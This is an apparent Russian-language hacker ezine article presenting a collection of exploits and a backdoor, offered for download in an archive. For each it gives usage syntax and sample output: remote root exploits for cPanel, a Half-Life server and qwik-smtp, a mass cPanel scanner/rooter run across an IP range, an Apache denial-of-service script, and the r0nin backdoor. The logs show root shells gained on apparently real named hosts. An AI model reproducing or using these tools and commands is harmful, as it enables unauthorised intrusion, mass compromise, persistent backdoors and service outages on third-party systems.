Здесь представлен обзор некоторых довольно-таки редких эксплоитов и 1 бэкдора. Их не так-то просто найти на public ресурсах.Все представленные эксплоиты прилагаются в архиве sploits-ezine1.tar.gz, ссылка на который в конце статьи. Бэкдор вынесен в отдельный архив.



Название экспоита: Private Remote Root Exploit for Cpanel
Поражаемые цели: <= 9.x
Разработан: Tal0n
Применение: ./cpanel-expl <хост>

Пример:

[zig@flopppp zig]$./cpanel-expl www.arax.md
nCPanel <= 9.x Remote Root Exploit, by Tal0n
Connect
Exploit Sent! Closing socket and sleeping for 5 seconds...
Done! Connecting to www.arax.md for shell...
Now Telnet www.arax.md port 5190
Telnet www.arax.md 5190
[root@arax root]id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
>

Имя файла в архиве: excpanel.c

Название экспоита: CPanel Scanner/Rooter
Поражаемые цели: <= 9.x
Разработан: luciffer;re-written by Tal0n
Применение: ./cpanelmassroot <диапозон>

Пример:

[zig@flopppp zig]$./cpanlemassroot 211
CPanel <= 9.x Scanner/Rooter, by Tal0n 03-13-04
Thanks to luciffer for main scanner source, great work! :)
Found possible vulnerable cpanel server 211.139.99.180
Trying exploit 211.139.99.180...
Exploitation Complete, moving on...

Имя файла в архиве: scancpanel.c

Название экспоита: Halflife- Remote Root exploit
Поражаемые цели: 3.1.1.1
Разработан: eSDee

Применение:

./hlexpl [-dDpPsTw] <-t тип> <хост>
-d <device> девайс. (по умолчанию: eth0)
-p <port> порт для удаллёного хоста (по умолчанию: 27015)
-D <delay> задержка. (по умолчинию: 12 seconds)
-T <timeout> Таймаут. (по умолчанию: 4 seconds)
-t <type> типы (0 для одного листа)
-P <pops> номер stackpop'ов
-s <address> адресс шеллкода
-w <address> write address

Пример:

[zig@flopppp zig]$ ./hlds-expl -t3 10.0.0.7
hlds - 3.1.1.1 - Remote exploit by eSDee ([email protected])
-----------------------------------------------------------
[+] Local IP address : 10.0.0.7:62428
[+] Target selected : hlds 3.1.1.1 - (hlds_amd)
[+] write address : 0x40143BD8
[+] shellcode address : 0x405CC1D4
[+] stack pops : 21
[+] Challenge id : 4050320626
[+] Shellcode XOR value: 0x8E
[+] Worked!
-----------------------------------------------------------
Linux flopppp 2.4.18-14 #1 Wed Sep 4 12:13:11 EDT 2002 i686 athlon i386 GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Имя файла в архиве: half.c

Название экспоита: r0nin backdoor
Поражаемые цели: *nix
Разработан: r0nin
Применение: ./r0nin

Пример:

[back@own back]$ ./r0nin
PsychoPhobia Backdoor is starting...OK, pid = 20570
[zig@flopppp zig]$ telnet www.backdoored.com 1666
([email protected]:/

Архив ( к сожалению бэкдор доступен только в бинарнике)

Название экспоита: qwik-smtp Remote Root Exploit
Поражаемые цели: qwik-smtp
Разработан: Dark Eagle
Применение: ./qwik

Пример:

[ziggy@ziGGy qwik]$ ./a.out -h localhost -u [email protected] -t 0 -i 127.0.0.1
==[ qwik_smtpd Remote Format String Exploit, bY Carlos Barros ]==

Target plataform : qwik_smtpd 0.3 - Fedor Core 2
Target host : localhost
Target port : 25
Target GOT : 0x0804b2e8
Target Retaddr : 0xfeffe6f0
** -> Connecting ... OK
** -> Getting the banner ... 220 SMTP service ready
**
** *** STAGE 1 ***
**
** -> Creating EvilBuffer ... OK
** -> Sending HELO with EvilBuffer ... OK
** -> Sending MAIL FROM with Shellcode ... OK
** -> Sending RCPT TO ... OK
** -> Sending DATA ... OK
** -> Sending "." ... OK
**
** *** STAGE 2 ***
**
** -> Creating EvilBuffer ... OK
** -> Sending HELO with EvilBuffer ... OK
** -> Sending MAIL FROM with Shellcode ... OK
** -> Sending RCPT TO ... OK
** -> Sending DATA ... OK
** -> Sending "." ... OK
** -> Attacking ... OK
**
** Try to send some commands. If doesn't work, hit CTRL+C to exit
**
** Linux ziGGy 2.6.8-1.521 #1 Mon Aug 16 09:01:18 EDT 2004 i686 i686 i386 GNU/Linux
** uid=0(root) gid=0(root)
** exit
** [ziggy@ziGGy qwik]$

Имя файла в архиве: qwuik-smtp.c

Название экспоита: Apache 2.0.52 8000x" " DoS attack
Поражаемые цели: Apache 2.0.52
Разработан: Noam Rathaus
Применение: ./apache_xpl.pl [хост] [порт]

Пример:

[ziggy@ziGGy expl]$./apache_xpl.pl la2.arax.md 80
Sending...
................................................................................
................................................................................
................................................................................
................................................................................
................................................................................
................................................................................
................................................................................
................................................................................
................................................................................
................................................................................
Done.

Имя файла в архиве: apche.pl
Архив

back content next